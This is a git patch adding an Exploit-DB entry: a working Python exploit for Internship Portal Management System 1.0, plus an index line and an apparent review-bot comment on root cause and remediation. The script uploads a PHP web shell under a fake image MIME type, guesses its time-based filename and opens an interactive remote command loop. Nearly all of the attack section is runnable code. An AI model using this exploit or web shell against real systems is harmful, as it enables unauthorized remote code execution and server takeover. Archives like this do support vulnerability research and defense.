From b8cf9ea0fcc49cc72c9270665ed296a12567753b Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Wed, 5 May 2021 05:01:52 +0000
Subject: [PATCH] DB: 2021-05-05 1 changes to exploits/shellcodes

Internship Portal Management System 1.0 - Remote Code Execution Via File Upload (Unauthenticated)
---
 exploits/php/webapps/49823.py | 74 +++++++++++++++++++++++++++++++++++
 files_exploits.csv | 1 +
 2 files changed, 75 insertions(+)
 create mode 100755 exploits/php/webapps/49823.py

diff --git a/exploits/php/webapps/49823.py b/exploits/php/webapps/49823.py
new file mode 100755
index 000000000..e302637fc
--- /dev/null
+++ b/exploits/php/webapps/49823.py
@@ -0,0 +1,74 @@
+# Exploit Title: Internship Portal Management System 1.0 - Remote Code Execution Via File Upload (Unauthenticated)
+# Date: 2021-05-04
+# Exploit Author: argenestel
+# Vendor Homepage: https://www.sourcecodester.com/php/11712/internship-portal-management-system.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=11712&title=Internship+Portal+Management+System+using+PHP+with+Source+Code
+# Version: 1.0
+# Tested on: Debian 10
+
+import requests
+import time
+
+#change the url to the site running the vulnerable system
+url="http://127.0.0.1:4000"
+#burp proxy
+proxies = {
+ "http": "http://127.0.0.1:8080",
+}
+#payload
+payload='"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo ""; die; }?>'
+
+#the upload point
+insert_url=url+"/inserty.php"
+
+def fill_details():
+ global payload
+ global shellend
+ global shellstart
+ print("Online Intern System 1.0 Exploit: Unauth RCE via File Upload")
+ #time start
+ shellstart=int(time.time())
+ #print(shellstart)
+ files = {'file':('shell.php',payload,
+ 'image/png', {'Content-Disposition': 'form-data'}
+ )
+ }
+ data = {
+ "company_name":"some",
+ "first_name":"some",
+ "last_name":"some",
+ "email":"some@some.com",
+ "gender":"Male",
+ "insert_button":"Apply",
+ "terms":"on"
+ }
+ r = requests.post(insert_url, data=data, files=files)
+ if r.status_code == 200:
+ print("Exploited Intern System Successfully...")
+ shellend = int(time.time())
+ #print(shellend)
+ shell()
+ else:
+ print("Exploit Failed")
+
+def shell():
+ for shellname in range(shellstart, shellend+1):
+ shellstr=str(shellname)
+ shell_url=url+"/upload/"+shellstr+"_shell.php"
+ r = requests.get(shell_url)
+ if r.status_code == 200:
+ shell_url=url+"/upload/"+shellstr+"_shell.php"
+ break
+
+ r = requests.get(shell_url)
+ if r.status_code == 200:
+ print("Shell Starting...")
+ while True:
+ cmd=input("cmd$ ")
+ r = requests.get(shell_url+"?cmd="+cmd)
+ print(r.text)
+ else:
+ print("File Name Error")
+
+
+fill_details()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 22a3745e5..441139a4f 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -43990,3 +43990,4 @@ id,file,description,date,author,type,platform,port
 49818,exploits/php/webapps/49818.py,"Piwigo 11.3.0 - 'language' SQL",2021-05-03,nu11secur1ty,webapps,php,
 49821,exploits/ruby/webapps/49821.sh,"GitLab Community Edition (CE) 13.10.3 - User Enumeration",2021-05-03,4D0niiS,webapps,ruby,
 49822,exploits/ruby/webapps/49822.rb,"GitLab Community Edition (CE) 13.10.3 - 'Sign_Up' User Enumeration",2021-05-03,4D0niiS,webapps,ruby,
+49823,exploits/php/webapps/49823.py,"Internship Portal Management System 1.0 - Remote Code Execution Via File Upload (Unauthenticated)",2021-05-04,argenestel,webapps,php,
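Review bot: The header block at the top of 49823.py records title, author, vendor and test platform but never states the root cause or the server-side remediation, which is what a defender triaging this archive entry needs most. From the visible code the weakness is that inserty.php accepts a multipart upload whose filename ends in .php under a client-declared image/png content type, and the probing loop in shell() then fetches it back from /upload/<epoch>_shell.php, so the handler appears to keep the client-supplied extension and serve uploads from the document root under a predictable name (the time-based prefix is inferred from that loop, not stated anywhere in the file). Suggested header comment after `# Tested on: Debian 10`: `# Root cause: inserty.php trusts the client-supplied filename/MIME type and stores uploads web-accessible under /upload/ with a predictable time-based name; remediation is a server-side extension allowlist with content validation, storage outside the webroot, and randomised file names.` The CSV index line in the second hunk is a generated entry and needs no change.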